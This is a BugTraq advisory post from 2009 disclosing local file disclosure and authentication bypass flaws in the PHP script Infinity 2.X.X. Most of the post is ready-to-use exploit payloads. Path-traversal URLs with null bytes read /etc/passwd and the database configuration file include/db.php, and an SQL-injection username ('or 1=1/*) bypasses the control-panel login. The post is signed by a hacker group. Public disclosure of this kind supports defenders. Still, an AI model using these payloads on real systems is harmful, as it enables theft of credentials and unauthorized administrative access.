BugTraq
Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities Aug 21 2009 04:49PM
gamr-14 hotmail com
-----------------Infinity <= v2.X.X (Local File Disclosure/Auth Bypass) Vulnerabilities-------------------------

Script : Infinity

version : 2.X.X

Language: PHP

Site: http://www.dimofinf.net/

Author: SwEET-DeViL

need magic_quotes_gpc = Off <-----(<>

------------------------------------------------------------------------
----------------------------------------

- +[Local File Disclosure]

#Exploit:

http://WWW.Site.Com/inf/?options[langfile]=../../../../../../etc/passwd%
00

http://WWW.Site.Com/inf/?options[style_dir]=../include/db.php%00

#

###

#

#-----------------------------------------------------------------------
-----------------------------------------

- +[Auth Bypass]

http://WWW.Site.Com/inf/cp

#Exploit:

username : 'or 1=1/*

password : SwEET-DeViL

#-----------------------------------------------------------------------
-----------------------------------------

#

###

#

/-------------www.arab4services.net-----------------|+------------------
------------------------------+ |

|| SwEET-DeViL & viP HaCkEr | |

|| gamr-14(at)hotmail.com | |

|+------------------------------------------------+ |

\---------------------------------------------------/

[ reply ]
 

Privacy Statement
Copyright 2010, SecurityFocus